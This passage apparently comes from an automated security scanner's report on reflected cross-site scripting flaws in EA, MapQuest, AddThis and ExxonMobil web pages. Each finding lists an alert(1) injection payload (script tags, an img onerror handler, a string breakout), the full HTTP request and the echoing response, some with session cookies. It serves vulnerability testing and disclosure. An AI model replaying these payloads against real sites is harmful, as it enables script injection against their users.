<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/a367c"><script>alert(1)</script>ae4ac210b80" />
...[SNIP]...

4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.labelinput.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567d0"><script>alert(1)</script>98d32ffa9bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/567d0"><script>alert(1)</script>98d32ffa9bc" />
...[SNIP]...

4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.pagination.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831bd"><script>alert(1)</script>7497a0ae74c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/831bd"><script>alert(1)</script>7497a0ae74c" />
...[SNIP]...

4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.slider.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cef64"><script>alert(1)</script>b67955c2239 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/cef64"><script>alert(1)</script>b67955c2239" />
...[SNIP]...

4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.sortlist.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59635"><script>alert(1)</script>cbba35aa5c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/59635"><script>alert(1)</script>cbba35aa5c1" />
...[SNIP]...

4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.spotlight.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abc04"><script>alert(1)</script>e547221dfcb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/abc04"><script>alert(1)</script>e547221dfcb" />
...[SNIP]...

4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.tab.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 160c2"><script>alert(1)</script>31a872bdf89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/160c2"><script>alert(1)</script>31a872bdf89" />
...[SNIP]...

4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/jquery/jquery.validate-1.5.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 100bf"><script>alert(1)</script>17b3cdbf2ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30486
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:17 GMT
Date: Fri, 24 Jun 2011 14:09:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/jquery/100bf"><script>alert(1)</script>17b3cdbf2ef" />
...[SNIP]...

4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/swfobject/swfobject.min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bcc7"><script>alert(1)</script>58f3214276b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30489
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:16 GMT
Date: Fri, 24 Jun 2011 14:09:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/js/swfobject/4bcc7"><script>alert(1)</script>58f3214276b" />
...[SNIP]...

4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.sa.mapquest.com
Path:   /mobil1/

Issue detail

The value of the tempset request parameter is copied into the HTML document as plain text between tags. The payload d16b2<script>alert(1)</script>d862442eea2 was submitted in the tempset parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mobil1/?tempset=searchd16b2<script>alert(1)</script>d862442eea2 HTTP/1.1
Host: web.sa.mapquest.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/lubricants.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
MIME-Version: 1.0
Date: Fri, 24 Jun 2011 13:32:47 GMT
Server: AOLserver/4.0.10
Content-Type: text/html; charset=iso-8859-1
ntCoent-Length: 80
Connection: close
Content-Length: 80


Could not locate searchd16b2<script>alert(1)</script>d862442eea2_query.html



4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6950<script>alert(1)</script>c6127f288fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1906
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpa6950<script>alert(1)</script>c6127f288fe?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telec
...[SNIP]...

4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89132"-alert(1)-"54224a98369 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php89132"-alert(1)-"54224a98369?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.0 404 Not Found
Date: Fri, 24 Jun 2011 13:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Content-Length: 1880
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php89132"-alert(1)-"54224a98369?source=tbx-250%2Cmax-250";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</sc
...[SNIP]...

4.150. http://www.ea.com/json/user-menu [returnUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ea.com
Path:   /json/user-menu

Issue detail

The value of the returnUrl request parameter is copied into the HTML document as plain text between tags. The payload 18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f was submitted in the returnUrl parameter. This input was echoed as 18bd9<img src=a onerror=alert(1)>2c4a66b853f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /json/user-menu?returnUrl=http%3A%2F%2Fwww.ea.com%2F1%2Fproduct-eulas18bd9<img%20src%3da%20onerror%3dalert(1)>2c4a66b853f&_=1308923169682 HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%252528openPositionedWindow%252528%252527http%25253A//www.info.ea.com%252527%25252C%25252520%252527info%252527%25252C%25252520780%25252C%25252520800%25252C%252525200%25252C%252525200%25252C%25252520t%2526ot%253DA%26eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 727
Content-Type: text/html; charset=utf-8

{"html":"<div id=\"mod-user-menu\">\n\t<div class=\"mod-header\"><\/div>\n\t<div class=\"mod-content\">\n\t\t<div class=\"content\">\n\t\t\t<ul>\n\t\t\t<li class=\"login\" title=\"Login\"><a href=\"https:\/\/www.ea.com\/profile\/login?returnurl=http:\/\/www.ea.com\/1\/product-eulas18bd9<img src=a onerror=alert(1)>2c4a66b853f\" id=\"mod-user-menu-login\">
...[SNIP]...

4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce8fd<script>alert(1)</script>e6edce38167 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoce8fd<script>alert(1)</script>e6edce38167 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 343
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.icoce8fd<script>alert(1)</script>e6edce38167 was not found on this server.</p>
...[SNIP]...

4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.exxonmobilstations.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bccb9<script>alert(1)</script>ded9f352e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bccb9<script>alert(1)</script>ded9f352e0=1 HTTP/1.1
Host: www.exxonmobilstations.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6m0100r2iivameub0gdtubf65; style=medium

Response

HTTP/1.1 404 Not Found
Date: Fri, 24 Jun 2011 13:55:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 345
